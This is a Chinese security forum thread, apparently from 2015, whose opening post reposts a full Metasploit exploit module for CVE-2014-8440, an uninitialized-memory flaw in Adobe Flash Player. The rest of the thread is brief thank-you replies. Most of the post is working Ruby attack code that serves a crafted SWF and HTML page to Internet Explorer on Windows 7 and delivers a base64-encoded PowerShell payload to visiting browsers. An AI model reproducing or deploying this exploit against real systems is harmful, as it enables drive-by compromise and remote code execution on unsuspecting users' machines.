查看: 95272|回复: 191

Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory Exploit

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2015-5-4 13:04:21 | 显示全部楼层 |阅读模式
    CVE-2014-8440
    Description:
    This Metasploit module exploits an uninitialized memory vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails to initialize allocated memory. When using a correct memory layout this vulnerability leads to a ByteArray object corruption, which can be abused to access and corrupt memory. This Metasploit module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 15.0.0.189.
    [C] 纯文本查看 复制代码
    ##
    # This module requires Metasploit: [url]http://metasploit.com/download[/url]
    # Current source: [url]https://github.com/rapid7/metasploit-framework[/url]
    ##
     
    require 'msf/core'
     
    class Metasploit3 < Msf::Exploit::Remote
      Rank = NormalRanking
     
      include Msf::Exploit::Powershell
      include Msf::Exploit::Remote::BrowserExploitServer
     
      def initialize(info={})
        super(update_info(info,
          'Name'                => 'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory',
          'Description'         => %q{
            This module exploits an unintialized memory vulnerability in Adobe Flash Player. The
            vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails
            to initialize allocated memory. When using a correct memory layout this vulnerability
            leads to a ByteArray object corruption, which can be abused to access and corrupt memory.
            This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with
            Flash 15.0.0.189.
          },
          'License'             => MSF_LICENSE,
          'Author'              =>
            [
              'Nicolas Joly', # Vulnerability discovery
              'Unknown', # Exploit in the wild
              'juan vazquez' # msf module
            ],
          'References'          =>
            [
              ['CVE', '2014-8440'],
              ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-24.html'],
              ['URL', 'http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html'],
              ['URL', 'http://www.verisigninc.com/en_US/cyber-security/security-intelligence/vulnerability-reports/articles/index.xhtml?id=1081']
            ],
          'Payload'             =>
            {
              'DisableNops' => true
            },
          'Platform'            => 'win',
          'BrowserRequirements' =>
            {
              :source  => /script|headers/i,
              :os_name => OperatingSystems::Match::WINDOWS_7,
              :ua_name => Msf::HttpClients::IE,
              :flash   => lambda { |ver| ver =~ /^15\./ && ver <= '15.0.0.189' },
              :arch    => ARCH_X86
            },
          'Targets'             =>
            [
              [ 'Automatic', {} ]
            ],
          'Privileged'          => false,
          'DisclosureDate'      => 'Nov 11 2014',
          'DefaultTarget'       => 0))
      end
     
      def exploit
        @swf = create_swf
        super
      end
     
      def on_request_exploit(cli, request, target_info)
        print_status("Request: #{request.uri}")
     
        if request.uri =~ /\.swf$/
          print_status('Sending SWF...')
          send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
          return
        end
     
        print_status('Sending HTML...')
        send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
      end
     
      def exploit_template(cli, target_info)
        swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
        target_payload = get_payload(cli, target_info)
        psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
        b64_payload = Rex::Text.encode_base64(psh_payload)
     
        html_template = %Q|<html>
        <body>
        <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
        <param name="movie" value="<%=swf_random%>" />
        <param name="allowScriptAccess" value="always" />
        <param name="FlashVars" value="sh=<%=b64_payload%>" />
        <param name="Play" value="true" />
        <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
        </object>
        </body>
        </html>
        |
     
        return html_template, binding()
      end
     
      def create_swf
        path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-8440', 'msf.swf')
        swf =  ::File.open(path, 'rb') { |f| swf = f.read }
     
        swf
      end
     
    end
    [2015-05-04]  #
    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 00:35:35 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-10-24 10:52
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2015-6-27 02:17:05 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 07:52:39 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2022-10-21 10:32
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2015-6-27 12:53:25 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 14:42:44 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2016-4-13 21:38
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-6-28 21:41:41 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-10-24 10:52
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2015-6-29 08:33:28 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-30 18:44:04 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-1 13:15:14 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-22 23:10 , Processed in 0.028025 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部